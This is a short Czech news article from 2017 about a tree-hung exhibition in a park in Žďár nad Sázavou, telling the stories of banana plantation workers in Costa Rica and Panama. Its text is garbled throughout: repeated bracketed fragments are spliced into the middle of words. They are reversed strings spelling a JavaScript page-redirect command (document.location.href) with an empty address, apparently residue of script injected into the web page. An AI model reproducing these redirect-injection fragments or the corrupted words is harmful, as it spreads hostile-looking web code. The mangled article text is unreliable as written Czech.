Rainbow page separator

Expozice na stromech bude ve žďárském parku viset do 14. října

Neděle, 8. října 2017

Žďár nad Sázavou / Až do 14. října si mohou lidé prohlédnout výstavu v parku „U Ivana“ nazvanou Příběh banánu, kterou zorganizovala a instalovala základní škola Na Radosti. Na stromech jsou vyvěšeny příběhy lidí, kteří v Kostarice a Panamě v těžkých podmínkách pracují na banánových plantážích. Kromě žďárského parku ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to příběhy visí i v desítkách dalších parků v České republice. Lidé se na 14 panelech s fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografiemi a textem dozvědí, co vše se skrývá za oblíbeným tropickým ovocem – banány.
„Na každého Čecha připadá ročně 9,9 kilogramu banánů. Jedná se o nejoblíbenější tropické ovoce. Málokdo už ale ví, za jakých podmínek se banány pěstují, třídí, balí a následně dostávají do Evropy. Rozhodli jsme se pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to třetí ročník Výstavy na stromech zaměřit právě na pěs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování banánů,“ uvedla Gabriela Štěpánková z organizace NaZemi, která akci zaštiťuje.
Výstava na stromech se koná v parcích po celé České republice již třetím rokem, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to při příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti Svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového dne důs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojné práce, který připadá na 7. října.